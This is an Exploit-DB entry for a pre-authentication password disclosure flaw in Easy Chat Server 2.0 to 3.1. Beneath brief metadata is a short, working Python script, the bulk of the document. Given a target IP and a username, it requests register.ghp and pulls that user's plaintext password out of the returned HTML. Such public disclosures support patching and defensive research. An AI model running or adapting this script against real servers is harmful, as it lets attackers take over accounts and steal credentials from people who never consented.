[] NeoSense

EFS Easy Chat Server 3.1 - Password Disclosure

Author: Aitezaz Mohsin
type: webapps
platform: windows
port: 
date_added: 2017-06-11 
date_updated: 2017-06-11 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url: http://www.exploit-db.com/screenshots/idlt42500/screen-shot-2017-06-11-at-112415.png 
application_url: http://www.exploit-db.comecssetup.exe

# Exploit Title: Easy Chat Server Remote Password Disclosure
# Date: 09/10/2017
# Software Link: http://echatserver.com/ecssetup.exe
# Exploit Author: Aitezaz Mohsin
# Vulnerable Version: v2.0 to v3.1
# Vulnerability Type: Pre-Auth Remote Password Disclosure
# Severity: Critical

# =========================================================================================================
#	Registeration page 'register.ghp' allows disclosing ANY user's password.
# Remote un-authenticated attackers can send HTTP GET requests to obtain ANY Easy Chat Server user password.
# =========================================================================================================

# USAGE: python exploit.py ip username

#!/usr/bin/python

import urllib
import re
import requests
import sys

ip = sys.argv[1]
username = sys.argv[2]

url = 'http://' + ip + '/register.ghp?username=' + username + '&password='
response = requests.get(url)
html = response.content

pattern = '<INPUT type="password" name="Password" maxlength="30"  value="(.+?)">'
result = re.compile(pattern)

password = re.findall(result,html)

x = ''.join(password)

password = x.replace("[", "")
password = x.replace("]", "")

print "Password: " + password